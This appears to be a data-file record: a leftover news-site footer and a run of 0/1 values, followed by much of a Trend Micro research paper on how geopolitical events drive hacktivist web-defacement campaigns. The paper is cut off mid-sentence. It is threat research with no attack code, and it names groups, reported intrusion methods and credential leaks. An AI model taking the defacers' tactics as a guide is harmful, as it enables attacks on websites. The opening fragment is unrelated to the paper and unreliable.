Jury 0 Steal This Show: \xe2\x80\x98How To Hack A Democracy\xe2\x80\x99 0 Music Companies Sue Internet Provider RCN For Enabling \xe2\x80\x98Massive\xe2\x80\x99 Piracy 0 ISPs Block BitTorrent Traffic Despite EU Net Neutrality Regulation 0 Copyright/licensing and Privacy Designed by RyanDownie Built by Van Patten Media","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks A TrendLabs Research Paper A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Marco Balduzzi, Ryan Flores, Lion Gu, and Federico Maggi with Vincenzo Ciancaglini, Roel Reyes, and Akira Urano Trend Micro Forward-Looking Threat Research (FTR) Team TREND MICRO LEGAL DISCLAIMER The information provided herein is for general information and educational purposes only. It is not intended and should not be construed to constitute legal advice. The information contained herein may not be applicable to all situations and may not reflect the most current situation. Nothing contained herein should be relied on or acted upon without the benefit of legal advice based on the particular facts and circumstances presented and nothing herein should be construed otherwise. Trend Micro reserves the right to modify the contents of this document at any time without prior notice. Translations of any material into other languages are intended solely as a convenience. Translation accuracy is not guaranteed nor implied. If any questions arise related to the accuracy of a translation, please refer to the original language official version of the document. Any discrepancies or differences created in the translation are not binding and have no legal effect for compliance or enforcement purposes. Although Trend Micro uses reasonable efforts to include accurate and up-to-date information herein, Trend Micro makes no warranties or representations of any kind as to its accuracy, currency, or completeness. You agree that access to and use of and reliance on this document and the content thereof is at your own risk. Trend Micro disclaims all warranties of any kind, express or implied. Neither Trend Micro nor any party involved in creating, producing, or delivering this document shall be liable for any consequence, loss, or damage, including direct, indirect, special, consequential, loss of business profits, or special damages, whatsoever arising out of access to, use of, or inability to use, or in connection with the use of this document, or any errors or omissions in the content thereof. Use of this information constitutes acceptance for use in an \xe2\x80\x9cas is\xe2\x80\x9d condition. for Raimund Genes (1963-2017) Contents Our Approach to the Investigation 5 Targets and Methods of Website Defacers 7 Real World Conflicts Reflected in Cyberspace 11 Auxiliary Activities of Defacement Groups 54 Conclusion 58 Web attacks\xe2\x80\x94attacks that compromise internet assets like mail servers, cloud infrastructures, and websites\xe2\x80\x94are troubling phenomena. The research community has put considerable effort into investigating these incidents but has mostly focused on detecting attacks and not delving into the reasons behind these attacks. Of course, the typical cybercriminal's goal is to profit. They might compromise websites to push ransomware, or they could try and steal data\xe2\x80\x94recent breaches show that information is an increasingly valuable commodity. But, as this paper discusses, more emotional motivations, such as patriotism, specific real-world events or simply hacktivism, can also trigger compromises. Web defacement hacktivism is the practice of subverting a website with the goal of promoting a specific agenda or political ideology. Methods may vary, but when hacktivists compromise a website, the usual tactic involves replacing the original page with their version\xe2\x80\x94a practice that is called web defacement. Hacktivism is mainly linked to web defacement, but a hacktivist (the attacker) can also be involved in traffic redirection (from a legitimate site to an attacker- owned site), denial of service (a form of service disruption), and malware distribution to support their particular cause. Dedicated websites like Zone-H1 collect evidence of web defacements and defacers can voluntarily advertise their compromise by submitting a report. Elaborating on the reasons behind web defacements at scale is not as easy as it seems. While someone could theorize that geopolitical events and conflicts influence cybercriminals\xe2\x80\x99 attacks against websites and their choice of victims, corroborating this phenomenon requires large-scale analysis. Our examination of over 13 million web defacement reports against websites spans over 18 years, covering multiple continents. We designed an internal system that gathers, analyzes, and clusters these millions of reports. As we identify the major campaigns of these defacers, we can provide further insights into how geopolitical events are reflected in web defacements. We also look at how different factors, such as the political beliefs and the decafers' religious inclination, can trigger and affect these attacks. Our first two sections provide high-level insights into our dataset of defacements, as well as some defining facts about the targets and tactics used by the defacers. Our next section on Real World Impact breaks down seven top campaigns that have affected Israel, France, India, Syria, Kosovo, and countries surrounding the South China Sea. We delve into specific conflicts in those areas and the defacements that happened in the aftermath. The succeeding sections cover the hacking groups' affiliations and how their collectives are organized\xe2\x80\x94some collectives are formed across continents, and some are a loose collection of local hackers. Recruitment tools and the methods used to distribute hacking techniques are also discussed. The final sections discuss other activities that defacers take part in, and how the current activities may evolve. Recently, there have been incidents of hackers who have gone from simple web defacement to activities supporting cybercrime. There is a real possibility that defacers and defacement groups will start to escalate their activities, move away from ideological motivations, and turn into cybercrime. 5 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Our Approach to the Investigation Our objectives include exploring motivations and influences behind website defacements, focusing on how geopolitical events act as triggers for web defacement activities. To better understand these dynamics globally, we gathered web defacement reports from third-party sources and processed them with an automated system we designed specifically for this purpose. Each web defacement report consists of: 1. Meta-information on the defacement, such as timestamp, website URL, the defacer's name, vulnerability, and more. 2. The deface page planted by the defacer (or modified, if this is the case). The deface page comes in the form of a source code (HTML/JS/CCS) and may contain small-sized external resources such as images. Additional content is fetched dynamically at analysis-time. Our system automatically analyzes each deface page via two components: 1. A static-code analyzer that extracts representative features (i.e., characteristics) from the page (like title, length, and encoding) in an offline manner. 2. A dynamic-code analyzer that renders the page with a headless browser and extracts additional features in an online fashion. This analyzer works better with dynamically generated pages (e.g., when a link is generated via JavaScript) or pages with external content like embedded streams of songs. The output of these components is a set of features that describe the page at high-level. These features are used as input for the following component: the campaign detector. The campaign detector looks for defacements that\xe2\x80\x94we believe\xe2\x80\x94are conducted by the same actor or criminal group. This is often the case with campaigns wherein multiple actors unite and conduct defacements that relate to each other, such as those with similar target choices or deface pages. In fact, defacers enlisted on the same campaign are usually provided with a template for rendering similar 6 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks deface pages. These templates provide consistency in promoting the criminal group and spreading the campaign's propaganda and motivations. This component groups similar pages accordingly, and represents them in form of clusters of web defacement campaigns. For this process, we make use of machine learning. We apply unsupervised learning to a set of features that well represents a summary of the pages \xe2\x80\x94 these are received from the static and dynamic analyzers mentioned before. The process automatically detects new campaigns and labels them for inspection. The result of this processing is indexed in an elastic-search back end and visualized via a web console. For each campaign, the console allows the analyst to inspect information like the lifespan of the campaign, the composition of the deface pages, as well as that of their actors. The console also allows analysis on how criminal groups are organized and if/when a certain actor belongs to multiple groups or moves from one to another. We will discuss the details of our system in a follow-up paper that will be released later in the year. 7 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Targets and Methods of Website Defacers As previously stated, our work is based on a large-scale analysis of 13 million website defacements that we collected from the following data sources: \xe2\x80\xa2 Zone-H2: 12,303,240 defacement incidents \xe2\x80\xa2 Hack-CN3: 386,705 defacement incidents \xe2\x80\xa2 Mirror Zone4 (now offline): 195,398 defacement incidents \xe2\x80\xa2 Hack Mirror5: 68,980 defacement incidents \xe2\x80\xa2 MyDeface6 (now offline): 37,843 defacement incidents Figure 1. The rate of web defacement records per year The total number of unique defacers is 104,135, and the total number of unique compromised domains is 9,929,484. Note that one domain can have multiple incidents recorded. 0 500K 1M 1.5M 2M 2016201520142013201220112010200920082007200620052004200320022001200019991998 8 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 2. Operating systems of defaced web sites Figure 3. Web servers of defaced websites Win 2008 Win 2000 Unknown Win 2003 Linux 338,306 402,076 637,392 1,548,583 9,074,567 Unknown IIS/5.0 Unspecified nginx IIS/6.0 Apache 244,402 334,898 757,306 1,525,578 8,541,048 9 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Other Modes RPC Server Intrusion Web Server External Module Intrusion Shares Misconfiguration Remote Administrative Panel Access through Bruteforcing SSH Server Intrusion Access Credentials through Man In the Middle Attack URL Poisoning Social Engineering FTP Server Intrusion Brute Force Attack Web Server Intrusion Undisclosed Vulnerability Configuration/Administrative Error Other Web Application Bug Other Server Intrusion Not Available Attack Against the Administrator/user (password stealing/sniffing) Known Vulnerability (i.e. unpatched system) 393,361 80,013 88,038 88,403 107,890 114,470 126,368 135,700 163,579 252,612 257,069 276,443 417,961 493,698 809,062 842,693 1,087,984 1,114,541 1,167,414 1,268,272 2,384,043 SQL Injection File Inclusion Vulnerabilities Figure 4. The methods of hacking as reported by defacers, based on defacement ID Information Based on the metadata voluntarily provided by the defacers (which we cannot validate), here is a visual representation of the class of vulnerabilities leveraged by the attackers: 10 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks The Role of Social Media We observed that defacers voluntarily leave contact information upon compromise, based on the features (i.e., characteristics) automatically extracted during the analysis of the deface pages. It seems to be common practice for attackers that push propaganda to advertise their beliefs and refer their \xe2\x80\x9cviewers\xe2\x80\x9d to social networking sites or provide contact emails of the group. Overall, we found that emails and Twitter are the primary forms of advertisement, with 25% (email) and 8% (Twitter) of pages displaying at least one of these. In fact, 6% of pages have multiple contact emails. In contrast, the telephone seems to be an unloved form of contact\xe2\x80\x94only 3% of our attack records have telephone information. Not a surprising percentage since it may expose the defacer to attribution. Another interesting aspect of propaganda-driven attacks on websites is the addition of streaming\xe2\x80\x94songs played in the background of the page or even visual aspects. Our data found that 32% of the defacements have an embedded URL referencing either a streaming provider (like YouTube) or an audio file hosted on an external resource that is most likely another compromised machine. We manually investigated some of these cases and confirmed that most of these songs are related to religion. 11 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Real-World Conflicts Reflected in Cyberspace Mass attacks, or attacks that typically use automated hacking tools to compromise as many websites as possible indiscriminately, are common across the web. But in the course of our research, we noted a more coordinated form of attack that we labeled \xe2\x80\x9ccampaigns\xe2\x80\x9d. In a campaign, the attackers launch specific attacks as a reaction to certain events, to push an agenda, make known their grievances, or spread political messages. Our system allowed us to identify the top seven campaigns connected to and motivated by real-world conflicts. In the graph below, the horizontal (X) axis pertains to the number of attackers participating in a particular campaign, while the vertical (Y) axis maps the number of hacktivism-related defacements on record. The data shows that the #OpIsrael campaign garnered the most number of attackers, while Free Kashmir has the most number of defacements. We will delve deeper into these campaigns in the succeeding sections. 0 100 200 300 400 500 0 5K 10K 15K 20K nu m be r of d ef ac em en ts number of attackers Free Kashmir #opisrael #savesyria #antiserbs #opindia #opfrance South China Sea Figure 5. Overview of the top seven defacement campaigns from collected data 12 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Conflicts Spark Anti-Israel Defacement Campaigns So far, we've identified three major anti-Israel web defacement campaigns. The first (and the longest) is #OpIsrael, which is composed of several campaigns supported by different groups. Then there is the #OpSaveGaza campaign, which is a short, but highly effective defacement campaign in reaction to Israel's Operation Protective Edge. Last is #OpBader / #ElectronicBader / #BaderOperation, a loosely organized campaign with multiple groups participating that has gained traction since May 2016. 0 200 400 600 800 1,000 1,200 31/08/201630/04/201630/09/201528/02/201530/07/201431/12/201331/05/201330/09/2011 #OpIsrael #opsavegaza #opelectronicbader... Figure 6. #OpIsrael, #opsavegaza and #opbader / #electronicbader / #baderoperation timelines The struggle between Israel and Palestine is one of the longest modern-day conflicts, starting in 1948 and continuing to this day7. Israel's continued occupation of the West Bank and military operations in Gaza only serve as fuel to the anger of Palestinians and other groups sympathetic to Palestine. 13 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks 0 3K 6K co.zaorg.ilinhugov.ghplitcafrnlinfodecom.brcom.aurunetco.ukorgco.ilcom Target TLDs of #OpIsrael Defacements These defacements are not random. As much as possible, the hacking groups target Israeli websites, as co.il and org.il top-level domains (TLDs) rank second and sixth respectively in the distribution of defaced websites carrying anti-Israel messages. Figure 7. Target sites for #OpIsrael #OpIsrael The very first #OpIsrael web defacement was made by ""imLulzPirate"" on August 26, 2012. The website myisrael.us fell victim to the defacement, with the main page of the website altered to display a politically charged message against Israel and Zionism. The defacement embeds a YouTube video uploaded by Canadians for Justice and Peace in the Middle East, condemning the Gaza War in December 2007 \xe2\x80\x93 January 2008. 14 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 8. The first #OpIsrael defacement made by imLulzPirate #OpIsrael did not gain any traction after the initial defacement made by imLulzPirate. It took several months for members of the Anonymous collective to support the cause and organize a campaign against Israeli websites. The first organized large-scale defacement campaign happened on April 7, 2013, a date chosen because it coincides with Holocaust Remembrance Day. This attack has been repeated every year since then, with 326 defacers executing 11,000 plus defacements on more than 5,400 domains. #OpIsrael Sub-campaigns #OpIsrael Engaged is a sub-campaign that started in 2015 and continued up to 2016. Similar to the main #OpIsrael campaign, it peaked every April 7. The AnonGhost team, a tight-knit group that claims to have members from Mauritania, Morocco, Malaysia, Indonesia, Tunisia, USA, and Ireland, mostly did the 2015 campaign. Anonymous Arabe, a loose group of hackers from Arabic-speaking countries in the Middle East and North Africa, was responsible for the majority of the 2016 campaign. 15 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 9. Defaced pages by AnonGhost Team and Anonymous Arabe showing identical wording for the #OpIsrael Engaged campaign It is worth noting that AnonGhost seems to have either branched out to other countries or has sub- groups, with AnonGhost being the umbrella group. So far we've seen AnonGhostDz, which is the Algerian sub-group, AnonGhost Indonesia, AnongGhost Gaza, AnonGhost Tunisia, AnonGhost Maldives, and AnonGhost Vietnamese. #OpIsrael Decided is another sub-campaign that started around the same time as #OpIsrael Engaged, and uses a similar message. It is supported mostly by an AnonCoders team that is a loose association of hackers from Albania, Tunisia, Morocco, Lebanon, Bangladesh, Indonesia, and France, among others. 16 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 10. #OpIsrael Decided defacement pages shows similar wording to #OpIsrael Engaged #OpBader / #ElectronicBader / #BaderOperation This is a larger campaign with 2,759 defacement records, which is as many as the #OpIsrael Engaged and #OpIsrael Decided sub-campaigns combined. While #OpIsrael Engaged and #OpIsrael Decided had standard templates (and the participating hackers did not do much to alter these templates), #OpBader is loosely organized, with templates and messages that vary quite significantly. The only common identifiable string we can find related to this campaign is the use of these hashtags: #opisrael #alfallagaTeam #fallaga #fallagateam #tunisianfallagateam #opbader #electronicBader #baderoperation #hackers #fallagahackers ""Bader"" is a reference to the Battle of Badr, a significant battle won by the Prophet Muhammad in the early years of Islam8. These historical references strongly indicate that these hacking groups view themselves as cyber-jihadists, viewing their actions as part of a digital jihad. #OpSaveGaza The #OpSaveGaza/#SaveGaza campaign is related to #OpIsrael since both target Israel and Israeli actions in Palestinian territories, but #OpSaveGaza/#SaveGaza is mostly influenced by events in the Gaza region specifically. On July 2014, Israel launched Operation Protective Edge, which included airstrikes and a land invasion aimed at destroying tunnels from Gaza to Israel9. Not surprisingly, the first instance of #OpSaveGaza/#SaveGaza appeared in response to the land invasion. The defacements continued until October, and only when hostilities in the Gaza strip subsided significantly did the 2014 campaign die down. #OpSaveGaza had 3,415 defacements within that short period, making it one of the most active web defacement campaigns. 17 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 11. Sample defacement pages of the #OpSaveGaza campaign #Save Gaza #Save Gaza started in July of 2016 as a sub-campaign under #opBader, primarily driven by Anonymous Ghost Gaza. Among the sub-campaigns discussed, it has been the most vocal and the most forceful. While #OpIsrael Decided and #OpIsrael Engaged use relatively tame language, #Save Gaza incites violence and puts direct pressure on Israelis, threatening to steal credit card information, bank credentials, and other website credentials. 18 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 12. Forceful language in the defacement campaign #Save Gaza It is worth noting that Anonymous Ghost Gaza followed through on their threat to steal the personal information of Israeli citizens. Members of Anonymous Ghost Gaza posted Israeli citizens' credit card information and online account credentials on their Facebook page and Pastebin. 19 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 13. Hacking groups publicly expose Israeli citizens\xe2\x80\x99 information and financial details 20 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Mohamad Bseso DexmoD AnonGhost GAZA fallaga team Anonymous Arabe MrHax Fallaga Team Dr.T3rr0r Memberal_Force Hitch |N|ewbieC27 VandaThe God Black Worm CapoO_TunisiAnoO Groups behind the Campaigns Hackers and hacking groups participating in #OpIsrael campaigns are mostly from Arabic-speaking countries in the Middle East and North Africa, with other groups from Bangladesh, Malaysia, and Indonesia also participating. Note that these are countries that do not recognize the validity of Israel as a state. Figure 14. Top 15 participating hacking groups and hackers The common use of the name ""fallaga"" by hackers and hacking groups in North Africa is a reference to ""felaghas"" or ""fellagha"", armed groups that were instrumental in driving out the French from Algeria in the Algerian War that lasted from the 1950s to early 1960s. Charlie Hebdo Aftermath Results in #OpFrance On January 7, 2015, two men attacked Charlie Hebdo, a French magazine that caused controversy several times in the past through its satirical cartoons about Islam and the prophet Muhammad. The attack left 12 people dead and 11 injured10. In the aftermath, France was a target of other attacks, this time in cyberspace. The smaller campaigns under #OpFrance include #OpCharlie, #OPCHARLIEHEBDO, and #AntiCharlieHebdo. 21 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks 0 350 175 9/2 5/2 01 6 8/2 8/2 01 6 7/1 7/2 01 6 1/2 4/2 01 6 1/1 0/2 01 6 1/3 /20 16 12 /27 /20 15 12 /20 /20 15 12 /13 /20 15 12 /6/ 20 15 11 /29 /20 15 11 /22 /20 15 11 /15 /20 15 11 /8/ 20 15 11 /1/ 20 15 10 /25 /20 15 7/1 9/2 01 5 7/1 2/2 01 5 7/5 /20 15 6/2 8/2 01 5 5/3 1/2 01 5 5/2 4/2 01 5 4/1 2/2 01 5 4/5 /20 15 3/2 2/2 01 5 3/1 5/2 01 5 3/8 /20 15 3/1 /20 15 2/2 2/2 01 5 2/1 5/2 01 5 2/8 /20 15 2/1 /20 15 1/2 5/2 01 5 1/1 8/2 01 5 1/1 1/2 01 5 1/4 /20 15 Figure 15. Timeline of #OpFrance\xe2\x80\x94activity peaked January to March 2015, right after the Charlie Hebdo attacks Target TLDs of #OpFrance Defacements Similar to the attacks against Israel, #OpFrance hackers were trying to target French websites, as evidenced by .fr domains having the second-most domains that had sites defaced. 0 500 250 ingouv.frcom.argrcabeplco.ukeucom.uainfodecom.brnlnetdkruorgfrcom Figure 16. Target sites for #OpFrance This campaign focused on French websites, with defacers targeting sites of companies like the French supermarket Carrefour, or sites with .fr TLDs. From our data, 36% of #OpFrance defacements have .fr TLDs. 22 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 17. Defacement pages for the #OpFrance campaign Hacking groups from Muslim-majority countries such as Tunisia, Syria, Mauritania, Morocco, Bangladesh and Indonesia began targeting French websites in an #OpFrance web defacement campaign that appear to be in support of the attacks. Some of the defacements even paraphrased Saudi-Australian Islamic preacher Junaid Thorne's statement on the matter, \xe2\x80\x9cIf you want to enjoy 'freedom of speech' with no limits, expect others to exercise 'freedom of action.'\xe2\x80\x9d 23 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 18. Defaced page promoting Islamic preachers\xe2\x80\x99 statement on Charlie Hebdo Even though several groups were part of #OpFrance, the Middle East Cyber Army was particularly active and did the majority of the defacements. This group includes members that belong to other hacking groups such as Anonymous Arabe and some hackers from North Africa. It is worth noting that one suspected member of the Middle East Cyber Army was arrested several months after the January \xe2\x80\x93 March #OpFrance campaign. The Bulgarian police arrested a 21-year-old Syrian student residing in Bulgaria, believed to be the leader of the group11. Based on the defacement pages of Middle East Cyber Army, the hacker with the alias ""The Greatest"" was arrested. The group modified their defacement pages to include #OPSaveTheGreatest after the arrest. Figure 19. Defaced page modified to support \xe2\x80\x9cThe Greatest\xe2\x80\x9d, who was supposedly arrested in Bulgaria 24 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Groups Behind the Campaigns The visualization below shows the Middle East Cyber Army to be the most active group behind #OpFrance. AnonGhost, which was active in the anti-Israel defacements, also widely participated, as well as hackers from Mauritius (Mauritania Coder), and some from Bangladesh and Indonesia. Middle East Cyber Army Mauritania coder MrAhSan HaXor Hani Xavi ZeSn Rexal Scooterist BL4CK- T3RRO- RIST Casa- blanca Haxorz Hexlook Amine Moodz AnoaGhost Owner Dzz Prosox Mr.bz AnonGhost Figure 20. Top 15 participating hacking groups and hackers Indian Border Disputes Trigger Campaigns Like Israel, India has unresolved territorial disputes with its neighbors and sees frequent clashes along its borders. The unresolved dispute with Pakistan regarding Kashmir and Jammu, as well as the challenges of patrolling and enforcing the border between India and Bangladesh (the fifth longest land border in the world), makes for a volatile situation. It's further exacerbated by constant defacements between Pakistani and Indian hacking groups, and between Bangladeshi and Indian hacking groups. 25 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Target TLD\xe2\x80\x99s of #OpIndia 0 250 500 bybiz.idOtherhucom.archlkbiznet.ininfocogov.inedu.inorg.innetorgco.inac.inincom Figure 21. Target sites of #OpIndia The hackers targeted Indian websites, as evidenced by the TLD's .in, ac.in, co.in, org.in, edu.in and gov. being in the top nine domains with websites defaced. Cricket leads to #riseofthetigers Even cricket teams became a trigger for defacement campaigns, illustrating the degree of tension between India and its two neighbors. The campaign #OpIndia started on March 2015, executed by Bangladeshi hackers, after Indian politician Shashi Tharoor tweeted that he preferred to face the Bangladesh cricket team (called The Tigers) in the Cricket World Cup quarterfinals. Tharoor reportedly felt Bangladesh was a weaker team that would give India an easier path to the finals. 26 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 22. Defacement page for #OpIndia with an image of the Bangladesh cricket team featured Figure 23. The Tharoor tweet that started the controversy Free Kashmir Led by Pakistani hacking groups ZCompany Hacking Crew (ZHC) and Muslim Liberation Army, Free Kashmir is a long-standing campaign that started in 2011. The attacks began with the calling out of the illegal occupation and human rights abuses the Indian Armed Forces committed against Kashmiris12. Free Kashmir has the most number of defacements out of all the campaigns studied, despite having only around half the number of attackers that #OpIsrael had. 27 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Pakistan is India's rival claimant to the disputed territory of Kashmir, and the defacement pages of both ZHC and Muslim Liberation Army commonly quote India's Penal Code Act No. 45 of 1860, which does not include the State of Jammu and Kashmir as part of India. However, the ruler of Jammu and Kashmir, Maharaja Hari Singh, acceded both territories to India in 194713. Figure 24. Free Kashmir campaign defacements The messages of ZHC and the Muslim Liberation Army have a Pakistani slant and do not necessarily reflect the sentiments of the Kashmiri people. However, they may gain traction with younger Kashmiris as ZHC and Muslim Liberation Army also highlight the human rights abuses and disappearances of Kashmiri activists and militants14, an issue that has not received international attention. Nationalism Inspires Retaliatory Hacking It is also quite common for hacking groups in India, Pakistan, and Bangladesh to start defacement campaigns against their rival country's websites. The presence of active hacking groups in neighboring, conflicting countries makes for a volatile situation, and these ""turf wars"" or ""nationalistic defacements"" can easily be triggered, and in a lot of cases, get out of hand. 28 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks One such incident happened in 2015 when a Pakistani hacker named Faisal 1337 hacked into multiple Indian websites. The government website of the state of Kerala was the most prominent website defaced. Figure 25. Indian local government websites hacked Immediately, hacking groups from India launched #op_pak_cyber_space, defacing hundreds of Pakistani websites in retaliation. Figure 26. Retaliatory attack from Indian hackers The defacement of Mumbai Airport Customs website by Pakistani defacer Alone Injector is another example. After the incident, Indian hackers retaliated with a campaign defacing the websites for Islamabad, Peshawar, Multan and Karachi airports in Pakistan. 29 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 27. Mumbai Airport Customs defacement Figure 28. The defacement page seen on Islamabad, Peshawar, Multan and Karachi airport websites 30 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Fallout of the Attacks between India and its Neighbors Aside from ongoing campaigns by Indian, Pakistani and Bangladeshi hackers (against or in response to each other's hacking), the real-world conflict between the three countries has significantly increased in the past two years. One event happened on January 2, 2016, when several terrorists attacked India's Pathankot Air Force base, killing several Indian military men and one civilian. The attack was later claimed and attributed to Jaish-e-Mohammed, a separatist group in Kashmir15. After the attack, Indian hacking groups retaliated by targeting Pakistani websites. Figure 29. Retaliatory defacements made by Team Indian Black Hats aka Indian Cyber Devils On September 18, 2016, attackers from Jaish-e-Mohammed, the same terror group responsible for the Pathankot Air Base attack a few months prior, launched another attack on an Indian army headquarters in Uri that left 17 army members dead, as well as all four attackers16. A few days later, the Indian government launched surgical strikes targeting locations in Kashmir. These series of incidents sparked back and forth campaigns between Indian and Pakistani hacking groups, with defacements containing politically charged messages, freedom slogans, or just plain hate speech. 31 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 30. Defacements generated by conflict with India Another event that triggered a sizeable defacement campaign was the drafting of Nepal\xe2\x80\x99s new constitution in September 2015. Some in India believed that the constitution marginalized certain ethnic groups; an issue that was highlighted when the Indian Express reported that India requested Nepal to make seven amendments to its constitution17. The report triggered an outrage in Nepal, as the message was seen as a foreign country meddling in the internal affairs of an independent sovereignty. The outrage triggered the #BackOffIndia campaign during October 2015, supported by DQN hacker and craXerbikash from Nepal, BloodSecurity from the Philippines, and several Pakistani hackers. Figure 31. A campaign triggered by India\xe2\x80\x99s involvement with Nepalese matters 32 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Groups behind the Attacks The most prominent anti-India defacements came from RiseOfTheTigers, a collective that was created just for the #OpIndia campaign in March 2015. Several Bangladeshi hacking groups joined RiseOfTheTigers: Bangladesh Grey Hat Hackers, Bangladesh Cyber Army, Team_CC, Bangladesh Script Kiddie Hackers, Blacksmith Hackers Team, 3xp1re Cyber Army, Bangladesh Black Hat Hackers, and others. RiseOfTheTigers Mr Anonymous Red Lizard Zero Cool Mr.Sh4hz3b-HaXoR rootheater Xl33tX_Sn4p3R Zain Haxor pk_Robot dulava! MrAhSan HaXor Mr Anon Criminal.BD Ghost_Root Mr. Bangladesh Figure 32. Top 15 participating hacking groups and hackers Military Actions prompt a #SaveSyria Campaign On April 22, 2016, the Syrian government launched airstrikes targeting residential areas in Aleppo during Friday scheduled prayers. The attacks happened despite a ceasefire agreement by both sides in February 2016. There were several more airstrikes, the worst of which hit the al-Quds hospital, killing 50 people18. The incident inspired a #SaveSyria campaign that exposed graphic images of wounded civilians in Aleppo. 33 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Target TLDs of #SaveSyria 0 1,500 750 infobeeufiplcom.uachbykzco.ukcom.brnlgrfrorgnetitdecomru Figure 33. Targeted domains of #SaveSyria Most of the #SaveSyria defacements targeted Russian websites because many suspected that Russia was behind the April 2016 airstrikes. Russia is seen as supportive of Syrian president Bashar al-Assad, and the country has reinforced Assad's regime through air superiority assets. Figure 34. Defaced sites showing graphic images of Aleppo 34 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks The Fallaga Team formed a loose collective called the Tunisian Cyber Resistance Al Fallaga Team, composed of Tunisian hackers and actively supported by hackers from Anonymous Arabe, Algeria, and Indonesia. They launched a defacement campaign with the hashtags #StopTheHolocaust, #AleppoIsBurning, #SaveAleppo and #SaveSyria. Campaigns Provoked by Kosovo Disputes Kosovo is a disputed territory and partially recognized state that declared its independence from Serbia in 2008. The majority of its population is of Albanian descent, and the country enjoys friendly relations with Albania stemming from common history and traditions. In Northern Kosovo, near Serbia, there are communities of Serbian descent that refuse to acknowledge Kosovo's independence. This tension reached a boiling point in 2011 when Kosovo Police clashed with ethnic Serbian rioters who refused to remove roadblocks going into enclaves of Serbian control19. Albanian hacking groups KSG-CREW, kwgdeface and AlbanianHackers launched the #AntiSerbs campaign a few months after the initial clashes. The campaign died down before the Brussels Agreement, which involved the integration of Northern Kosovo into Kosovo and had Kosovo Serbs manning the police and judiciary, was concluded. 0 200 400 3/3 1/2 01 4 2/2 8/2 01 4 1/3 1/2 01 4 6/3 0/2 01 3 3/3 1/2 01 3 1/3 1/2 01 3 12 /31 /20 12 11 /30 /20 12 10 /31 /20 12 7/3 1/2 01 2 5/3 1/2 01 2 4/1 9/2 01 2 3/3 1/2 01 2 2/2 9/2 01 2 1/3 1/2 01 2 12 /31 /20 11 11 /30 /20 11 10 /31 /20 11 Figure 35. Timeline of anti-Serbs campaign The defacement pages showed support for Kosovo independence, and also mentioned contested towns commonly involved in civil unrest. They listed Serbian-controlled territories bordering Kosovo with an Albanian majority and declared their desire to separate from Serbia and join Kosovo. 35 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 36. Web defacement pages supporting Kosovo Disputes in the South China Sea OpPhilippines and OpTaiwan On May 9, 2013, a maritime incident involving the Taiwanese fishing boat Guang Da Xing No. 28 and the Philippine Coast Guard resulted in the death of Taiwanese fisherman Hung Shih-cheng (\xe6\xb4\xaa\xe7\x9f\xb3\xe6\x88\x90)20. This incident led to many consequences, including sanctions and a military drill from Taiwan government, protests in Taiwan, and several cyberattacks. On May 10, 2013, people in Taiwan called for DDoS attacks against .gov.ph to force the Philippine government into issuing an official apology. Many hackers responded, attacking more than 30 .gov.ph sites21. 36 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 37. Forum post mobilizing visitors to launch DDoS attack On May 11, Filipino hacker ""Pinoy Vendetta""22 sent a warning message to Taiwanese hackers by defacing one Taiwan government site and several commercial sites. In response, AnonTaiwan launched #OpPhilippines the next day. 37 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Figure 38. Web defacement page from ""PinoyVendetta"" After the attack, AnonTaiwan posted leaked data from .gov.ph sites on Pastebin. One noteworthy victim was dns.gov.ph, which is the .gov.ph domain registry website. More than 2,300 accounts, which were possible admin accounts for .gov.ph domains, were leaked. These government sites faced a 